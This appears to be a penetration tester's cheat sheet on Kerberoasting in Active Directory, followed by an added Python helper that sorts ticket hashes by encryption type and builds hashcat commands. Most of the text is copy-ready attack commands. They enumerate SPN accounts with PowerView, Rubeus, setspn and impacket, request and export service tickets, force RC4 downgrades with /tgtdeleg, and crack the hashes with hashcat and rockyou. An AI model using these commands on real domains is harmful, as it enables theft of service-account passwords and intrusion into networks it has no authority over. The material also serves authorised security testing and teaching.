
Kerberoasting

Tags
Kerberos, Authenticated

Identify

Windows

ActiveDirectory module in PowerShell (needs RSAT / the AD module installed on the host)

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Local

Using Powerview

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Local
setspn.exe -Q */*
Local

Using Rubeus

.\Rubeus.exe kerberoast /stats

Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username
remote

Exploit

From Linux

impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request
remote (request a TGS for every SPN-bearing user and print the hashes)
impacket-GetUserSPNs -dc-ip <dcip> domain.local/username -request-user <target_user>
remote (request a single user's TGS)

add -outputfile <file> to either command to write the hashes straight to a file in hashcat format

Crack hash

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
mode 13100 is for RC4 (etype 23) tickets; AES tickets need -m 19600 (etype 17, AES128) or -m 19700 (etype 18, AES256) and crack far more slowly

From Windows

Semi-manual approach

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
list users with an SPN set
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
request a specific user's TGS and set the output format
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
export all tickets for offline processing

Rubeus

.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
/tgtdeleg obtains a usable TGT through the GSS-API delegation trick (no elevation needed) and sends the TGS-REQs asking for RC4 (etype 23), so accounts that would otherwise return AES tickets hand back RC4 ones, which are far easier to crack

Domain controllers on Windows Server 2019 and later ignore an RC4-only etype request for accounts that have AES enabled in msDS-SupportedEncryptionTypes: the ticket comes back AES-encrypted anyway. The downgrade therefore only works against accounts that are still RC4-only, and AES tickets have to be cracked with -m 19600 / 19700 instead of 13100.
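Because a single roast can return a mix of RC4 and AES tickets (the crack-hash step and the Server 2019 caveat above), it helps to sort the output by etype before running hashcat. The script below is an added example, not part of the original notes or of impacket/Rubeus: it parses the $krb5tgs$ lines those tools write, groups them by encryption type, picks the matching hashcat mode and prints the command for each group. The sample hashes, the DOMAIN.LOCAL realm and the account names are constructed for the demo; they have the right layout but the checksum/edata fields are filler, not real ticket ciphertext.

```python
"""Sort Kerberoast hashes by etype and pick the right hashcat mode (added example)."""
import re
from collections import defaultdict

# etype -> hashcat mode. RC4 (23) keys are plain NT hashes, so they crack fast;
# AES (17/18) keys come from PBKDF2 with 4096 iterations and crack far slower.
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# Checksum length in hex chars: 16 bytes for RC4, 12 bytes for AES.
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}

_HEADER = re.compile(r"^\$krb5tgs\$(?P<etype>\d+)\$(?P<rest>.+)$")
_HEX = re.compile(r"^[0-9a-fA-F]+$")


def parse_krb5tgs(line: str) -> dict:
    """Parse one $krb5tgs$ line into its fields; raise ValueError if malformed.

    Layouts as written by impacket / Rubeus /nowrap / PowerView -Format Hashcat:
      RC4:  $krb5tgs$23$*user$REALM$spn*$<checksum>$<edata>
      AES:  $krb5tgs$17$user$REALM$*spn*$<checksum>$<edata>   (18 likewise)
    """
    m = _HEADER.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ hash")
    etype = int(m.group("etype"))
    if etype not in HASHCAT_MODES:
        raise ValueError(f"unsupported etype {etype}")
    # checksum and edata are always the last two '$'-separated fields
    fields = m.group("rest").rsplit("$", 2)
    if len(fields) != 3:
        raise ValueError("missing checksum/edata")
    head, checksum, edata = fields
    # strip the '*' markers that differ between the RC4 and AES layouts
    parts = head.strip("*").split("$", 2)
    if len(parts) != 3:
        raise ValueError("cannot split user/realm/spn")
    user, realm, spn = parts
    spn = spn.strip("*").replace("~", ":")  # impacket writes ':' in the SPN as '~'
    if len(checksum) != CHECKSUM_HEX_LEN[etype] or not _HEX.match(checksum):
        raise ValueError("bad checksum for etype")
    if not edata or not _HEX.match(edata):
        raise ValueError("bad edata")
    return {"etype": etype, "mode": HASHCAT_MODES[etype], "user": user,
            "realm": realm, "spn": spn, "checksum": checksum}


def split_by_mode(lines):
    """Group hash lines by hashcat mode; return (groups, skipped_lines)."""
    groups, skipped = defaultdict(list), []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        try:
            info = parse_krb5tgs(line)
        except ValueError:
            skipped.append(line)
            continue
        groups[info["mode"]].append(line)
    return dict(groups), skipped


def hashcat_cmd(mode: int, hashfile: str,
                wordlist: str = "/usr/share/wordlists/rockyou.txt") -> list:
    """Build the hashcat argv for one mode-specific hash file."""
    return ["hashcat", "-m", str(mode), hashfile, wordlist]


# Constructed sample lines (layout only; checksum/edata are filler, not real ciphertext).
SAMPLE_HASHES = [
    "$krb5tgs$23$*sqldev$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local~1433*$"
    + "0f" * 16 + "$" + "a1b2c3d4" * 8,
    "$krb5tgs$18$svc_backup$DOMAIN.LOCAL$*backup/srv01.domain.local*$"
    + "1a" * 12 + "$" + "deadbeef" * 8,
    "$krb5tgs$17$svc_web$DOMAIN.LOCAL$*http/web01.domain.local*$"
    + "2b" * 12 + "$" + "cafef00d" * 8,
    "this line is not a hash and should be skipped",
]

if __name__ == "__main__":
    groups, skipped = split_by_mode(SAMPLE_HASHES)
    for mode, hashes in sorted(groups.items()):
        path = f"roast_{mode}.txt"
        with open(path, "w") as fh:
            fh.write("\n".join(hashes) + "\n")
        print(f"{len(hashes)} hash(es) -> {path}:", " ".join(hashcat_cmd(mode, path)))
    for line in skipped:
        print("skipped:", line)
```

Feed it the -outputfile from GetUserSPNs or the /nowrap output of Rubeus instead of SAMPLE_HASHES; anything that lands in the 19600/19700 files is an AES ticket, which is what you get from AES-enabled accounts on 2019+ DCs regardless of the etype you asked for, so budget cracking time accordingly.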